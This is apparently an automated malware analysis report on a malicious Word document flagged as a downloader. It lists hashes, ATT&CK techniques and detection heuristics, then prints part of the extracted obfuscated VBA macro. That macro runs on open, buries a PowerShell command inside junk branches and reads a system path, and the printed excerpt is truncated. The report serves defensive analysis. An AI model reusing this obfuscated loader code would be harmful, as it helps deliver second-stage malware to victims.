Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e87db3729fb37d1…

MALICIOUS

Office (OLE)

205.5 KB Created: 2018-09-03 18:27:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 6a1657a19da69e6e9737527c54bf9bb1 SHA-1: 47afe2ceab39d4e1406b21574d4971d9995d3cf4 SHA-256: 1e87db3729fb37d15692a78925b755652263d215db93b0a174e827b71faf0742
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6704836-0' further supports its role as a downloader.

Heuristics 8

  • ClamAV: Doc.Downloader.Valyria-6704836-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60677 bytes
SHA-256: 434be1ef9d3e9d48483bd84ca3a902b0f12dc1a1ab35e36ccccf793cd746ed6d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
e_kuixtvhu = NaN
If 8629 >= 4178 Then
ieubdbdau = "$poglouhaouyi='a08 + 11';$"
End If
ymksie = NaN
Select Case 62 * 92
Case 5704
ipxiqk = "odyblodpvayioohstaoou='y Byp';"
yead5 = NaN
ieubdbdau = ieubdbdau + ipxiqk
Case ypfmguena76
qsmxwiy = NaN
End Select
ystux = NaN
Select Case "plngvx_gdsy"
Case "plngvx_gdsy"
bmcljhkfu_ybk = "$wiaatvofxaacbo_ea='{ "
keoekcoi = NaN
ieubdbdau = u_mntwhri + ieubdbdau + bmcljhkfu_ybk
End Select
aqaiymsz = NaN
If 66 - 64 = 2 Then
wicfdpu_j7 = "$u_';$m"
ieubdbdau = yloy + ieubdbdau + wicfdpu_j7 + msafzxub
End If
ljihzy = NaN
If 3526 < 1990 Then
Dim ldfiioqe8
ldfiioqe8 = NaN
kjfonwnfqyzf = NaN
ifmhkxqc = NaN
v_appioi = NaN
Else
ofn_ougxa = Environ("SystemRoot")
End If
srmujouxd = NaN
Select Case 72 * 46
Case 3312
uiyiy = ieubdbdau + ejurafkp
Dim irhnxzqhd_otb As String
irhnxzqhd_otb = NaN
eipnu = "rovtemqiebbsr"
kkeibld = NaN
uiyiy = uiyiy + eipnu
Case erudievg_o
iiugdkpd = NaN
End Select
yumy_o_yni = NaN
Select Case "ywzmxuboizq"
Case unhkntzpipo
inmyzrexg = NaN
Case "ywzmxuboizq"
fuayuakgo = qaa_nomyz + uiyiy + uigctkyvz
kkdvii = NaN
fuayuakgo = fuayuakgo + "ommygi_rofj='tion';$"
End Select
iqiec48 = NaN
If 1244 >= 1442 Then
cqtal = NaN
rkmqulm = NaN
ElseIf 3799 > 3177 Then
upvqbeee = "okpmlqslexjoidfhqn_y='$pat';$yhdirprdgnaiomk"
fuayuakgo = fuayuakgo + upvqbeee
Else
iebgr = NaN
Dim urdol As String
urdol = NaN
amjhbtdfydy = NaN
du_ejbwjd = NaN
End If
wsuaji = NaN
Select Case 20 - 96
Case 8777
yyayj = NaN
Case uoeiqeyu
aiuy3 = NaN
Case -76
yoyiiofe = uydnhwejnz + fuayuakgo + gmjvia
uozufftcz = NaN
yoyiiofe = iu_fewi + yoyiiofe + "af"
End Select
lz_afboi_qjy = NaN
If 4360 >= 8316 Then
ElseIf 93 * 91 = 4396 Then
Dim y_zdsuq
y_zdsuq = NaN
eioev = NaN
Else
aogea = e_oedacg_dze1 + yoyiiofe
eoyjnmuu = NaN
aogea = aogea + "nh='x.inf';$u_vdeauykabiyy0"
End If
tpcpaifj = NaN
Select Case 53 + 85
Case 138
o_uev = "7='yunr97"
hzdulbtdewq = NaN
aogea = aogea + o_uev
End Select
tlogwb = NaN
Select Case 70 + 46
Case afii
xhsqpuyajf = NaN
Case 116
iuocaemw = ooerwk + aogea + yifhgmtvq
qpaxas60 = NaN
iuocaemw = iuocaemw + "'')';$sjtmhccih_zo_sveofzomibxhrbeknjei"
End Select
yxtbp = NaN
Select Case "yzfstaytxy7"
Case "yzfstaytxy7"
rljpaeu_i_oa = "vu_oo='i"
meeyaxky = NaN
fjvaifni = NaN
uhqb_t = NaN
iuocaemw = iuocaemw + rljpaeu_i_oa
Case e_oftff_oee6
yczv_qjoye = NaN
Case 19733
yoiur = NaN
End Select
exbvui90 = NaN
Select Case 54 - 51
Case 3
aefpzojo = "le(1)';$oepyvti_gyuxipwoai"
qvou_mbe_n = NaN
iuocaemw = iuocaemw + aefpzojo
End Select
Dim qqofvifqi As String
qqofvifqi = NaN
If 8316 >= 3617 Then
ekwqb = "\syste"
ofn_ougxa = ofn_ougxa + ekwqb
Else
wewgxj = NaN
btttoixqtn = NaN
End If
yahqgd66 = NaN
If 44 + 19 = 25 Then
Dim aoolwiw As String
aoolwiw = NaN
ysdml_i = NaN
ElseIf 2 * 29 = 544 Then
sshoj = NaN
ufbeuq = NaN
Else
yixwl_oi = "='bcli';$qtik"
iuocaemw = iuocaemw + yixwl_oi + pduayjpo
End If
hsybdoi = NaN
Select Case 65 + 51
Case 116
jnsdh_la = iuocaemw
yozydfzo = NaN
jnsdh_la = jnsdh_la + "wja_eioiaer"
Case 24826
uigpwxae35 = NaN
Case 23636
Dim sbao_ey
sbao_ey = NaN
End Select
sczgzy = NaN
Select Case "aobhiht"
Case 18926
vteuicx = NaN
Case "aobhiht"
tlsquzn_wlle = jnsdh_la + oohcdyawta
bbokxaiu_o = NaN
tlsquzn_wlle = tlsquzn_wlle + "davqghiyamgyegnmvdyaut='uble]$"
Case 8928
hga_ebe = NaN
End Select
pvqsabk = NaN
Select Case "ou_yaxau77"
Case iksjrxeofy
dzzpitqh = NaN
Case yjnoeg
hqwae = NaN
Case "ou_yaxau77"
yketpsto = "a';$leiqdaikaupphgaoixrwlt"
ecrfqtqwi = NaN
tlsquzn_wlle = tlsquzn_wlle + yketpsto
End Select
hyey_qpi = NaN
pkeaov = NaN
io_iyu_bti = NaN
Select Case "excwtoq"
Case "e
... (truncated)